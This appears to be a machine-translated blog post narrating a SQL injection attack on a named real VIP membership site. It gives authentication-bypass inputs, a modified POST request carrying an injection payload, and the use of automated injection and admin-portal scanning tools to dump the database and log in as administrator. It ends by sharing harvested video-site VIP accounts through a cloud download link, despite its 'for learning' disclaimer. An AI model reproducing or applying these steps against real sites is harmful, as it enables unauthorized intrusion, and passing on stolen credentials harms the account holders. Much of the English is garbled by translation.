Write a SQL injection session

Just found the loophole, I have successfully implemented the injection, because afraid to send to the internet after being played bad, has not been released. Today to see, the original page has been inaccessible, now sent should be no big problem.

This article is only for learning and communication, the purpose is to build a more secure network environment! Inject address

A special VIP Member System http://www.tcmpv.com/index.php/Home/Public/login.html

Related tools

Injection tools:

Super SQL Injection Tool "Ssqlinjection" http://www.shack2.org/article/1417357815.html

Ming Boy

Grab Bag Tool:

Wireshark

Injection process 1. Testing the vulnerability 1) test 'First open the Web page, such as:

Look at this very low system, there could be loopholes.

Don't say much nonsense, enter the single quote "'" to test:

Enter single quotation marks

Test results

Seeing the test results report a database error proves that the system has a SQL injection vulnerability. And these careless procedures ape even the database table name directly exposed (Tp_login), this is not equivalent to directly write:

"I have loopholes, welcome to inject!" "

2) test ' or ' = '

Further testing, enter "' or ' = '", click OK, directly on the login succeeded, such as

Enter "' or ' = '", click OK

Login successful

Without the password, go straight in, it seems that the loopholes really exist!

3) test 3389 ' and 1=1 and ' a ' = ' a

Next test can not use the injection statement, here are two options:

• Continue using the OR statement

• Find the real password

The or statement is preceded by a description of the password (or the same principle)

The way to get the password is given directly on the webpage:

Add the group, get the password: 3389

Construct a new injection statement: "3389 ' and 1=1 and ' a ' = ' a", test:

Successfully logged in again to confirm that an injection attack can be made.

Next you can database name (mentioned earlier, the login error message already contains the database name "Tp_login", really easy AH), table name, column name ... 's guess.

The specific method of manual guessing can be referred to here:

SQL injection Instance analysis (http://www.cnblogs.com/leftshine/p/SQLInjection.html)

Of course, the amount of manual speculation is too large, so laborious things to be handed over to the program, but it is strongly recommended to look at this article to understand the basic principles of SQL injection, otherwise the operation of a blank.

2. Construct the packet

Because the system cannot simply pass the information through the URL of the Web page, we need to construct the packet to inject the packet to send by post.

1) Manual construction:

According to the post packet structure to manually construct a data packet for injection, specifically how to construct that is going to learn the network protocol well ...

2) Grab bag construction

This is much simpler, we directly crawl the normal sending of the packet, the transformation can be used to inject!

Here we use Wireshark to grab the packet, about Wireshark crawl and analysis HTTP packet, refer here: Application layer protocol FTP, DNS protocol, HTTP protocol analysis (http://www.cnblogs.com/leftshine/p/5698890.html)

The contents of the post packet captured using Wireshark are as follows:

Post/index.php/home/public/do_login.html http/1.1

Host:www.tcmpv.com

Connection:keep-alive

Content-length:8

Cache-control:max-age=0

accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin:http://www.tcmpv.com

Upgrade-insecure-requests:1

user-agent:mozilla/5.0 (Windows NT 10.0; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/45.0.2454.101 safari/537.36

content-type:application/x-www-form-urlencoded

Referer:http://www.tcmpv.com/index.php/home/public/login.html

Accept-encoding:gzip, deflate

accept-language:zh-cn,zh;q=0.8

cookie:phpsessid=*****************************; uid=11; Num=1; Time=2016-07-30+10%3a55%3a47; a7207_pages=22; A7207_times=1

key=3389

Modify the post package to use for injection:

Post/index.php/home/public/do_login.html http/1.1

Referer:http://www.tcmpv.com/index.php/home/public/login.html

user-agent:mozilla/5.0 (Windows NT 10.0; Win64; x64) applewebkit/537.36 (khtml, like Gecko) chrome/42.0.2311.135 safari/537.36 edge/12.10240

content-type:application/x-www-form-urlencoded

Accept-encoding:gzip, deflate

Content-length:8

Host:www.tcmpv.com

Connection:keep-alive

Pragma:no-cache

cookie:phpsessid=*****************************; uid=11; Num=1; Time=2016-07-30+10%3a55%3a47; a7207_pages=22; A7207_times=1

key=3389<sencode>% ') #inject ##<eencode>

This packet can be automatically generated by the software "Super SQL Injection Tool" according to the above package, please refer to the appropriate instructions for use in the software compression package.

3. Inject

In fact, as long as we will crawl into the packet stuck in the program, and then click on the "Automatic recognition", the software will automatically configure the corresponding, and then see the situation changes can be (under normal circumstances, automatic configuration can be done).

Once configured, click "Send Data" to verify that the currently configured packets are eligible, and if the page information is returned correctly, the configuration is available:

Return page information correctly

Although the figure shows "Login failed", but proves that the page information can be returned correctly, the configuration is available!

4. Get Database Information

Click to get Data

Get Data

Then go to the datacenter, get library, get table, get column, get data:

Database Information at a glance

You can see that the "tp_login" table and the "3389" password are indeed known.

The next step is to get the data as freely as possible.

The data that gets to

Admin account information obtained:

Administrator account Information

With the Administrator account information, how to use it? On the second software: "Ming Boy", in fact, it is an injection tool, do not know whether the age is too long ... A lot of features are not practical. Here we only use the "Manage Portal scan" feature, such as:

Manage Portal Scans

Get to 4 links, open one by one, and find this can be used:

Http://www.tcmpv.com/index.php/Admin/Public/login.html

Administrator Login

Enter your account password, login

Login successful

Login success, see the smiling face is really happy!

Successfully entered the background

Successfully into the management background, found that there is no value of information, but there are a lot of a video site VIP account, also do not build these million people riding the account can be used ...

At this point, the entire SQL injection completed successfully!

Benefits (account acquired after injection):---------------- Split Line ---Link: https://eyun.baidu.com/s/3boCXbXl password: iqiyi

Related reading: SQL injection Instance Analysis | JSP uses filters to prevent SQL injection

Write a SQL injection session